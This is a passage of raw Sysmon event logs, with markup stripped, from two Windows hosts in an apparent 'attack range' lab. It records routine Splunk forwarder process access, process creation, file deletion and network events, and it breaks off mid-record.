10341000x8000000000000000223837Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223836Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223835Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1AE9-6216-7605-000000003902}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223834Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AE9-6216-7605-000000003902}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223833Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.383{4F8D34B0-1AE9-6216-7605-000000003902}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000223832Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.101{4F8D34B0-1AE8-6216-7505-000000003902}22641828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000300012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:50.824{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63F3BFEB3EB333DBFA9CBF7D6A911C87,SHA256=39FBCD9C163D98D5E1A28C26BA54AC202978F6C2281E5D5D3380140FD4FD404A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223848Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:50.179{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C6A3F8F0A600705FFE91F2538BA54C,SHA256=45C58E626461188845D552C1DADE9810962B940156F088A4E2B9E556BD10F1FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:48.697{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49685-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:51.825{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63CF60E4812DEDB860E18E8E6EBA5357,SHA256=6AA766FBA5F5D07C3D5CD278AC26829729BC4668B8243D85D983E6649B0F0C87,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223863Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.559{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51813-false10.0.1.12-8000- 10341000x8000000000000000223862Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AEB-6216-7705-000000003902}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223861Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223860Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223859Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223858Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223857Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223856Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223855Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223854Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223853Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223852Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1AEB-6216-7705-000000003902}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223851Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.304{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AEB-6216-7705-000000003902}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223850Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.305{4F8D34B0-1AEB-6216-7705-000000003902}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223849Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:51.257{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4166EF000C96B76B57CB870407015D6,SHA256=48AD05B3834543E14301D3D08D1AACEAA65673D685C7E49C408E61D7DBE59FFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:52.840{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=400701CAF20777AD93083E713EB2C9E8,SHA256=74DF27553F9501658B1202D49035AC98FC07A67D96188E25DCF20AB0D75DCD3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223865Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:52.382{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89B018398449B0B9479345BBD67DC4E1,SHA256=FB58F29BA499764D48A2EF22EDC2B07775253B9FCE0F92D11CD6B046F8F1F078,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223864Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:52.319{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAE9D3FA7B7B9122E9E7780B9B35C1CC,SHA256=CB422F9C832E7BD9EFD52CCA3E844CAF07038842C0F3793F4B5271DBE6324242,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:53.890{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=006CBD439940E811CE77BF05EDAF5B2A,SHA256=095FEA44E35EC3ABC4F0A5B5816B373F25F519A14AA4ABDA3158D598C0139D5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223866Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:53.460{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6826CDC72DBF106049C2071108F9194,SHA256=F3A8B1AA093DCA6705A6BFBA040BF143A31DCA438B307C986A54678596D798C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223867Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:54.600{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F203342A0E3CDA53BA959D045367EFC,SHA256=9AC1CA38814A758BD0FC42844DD080C03BAFC2471829639E2E74549883C5A2AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 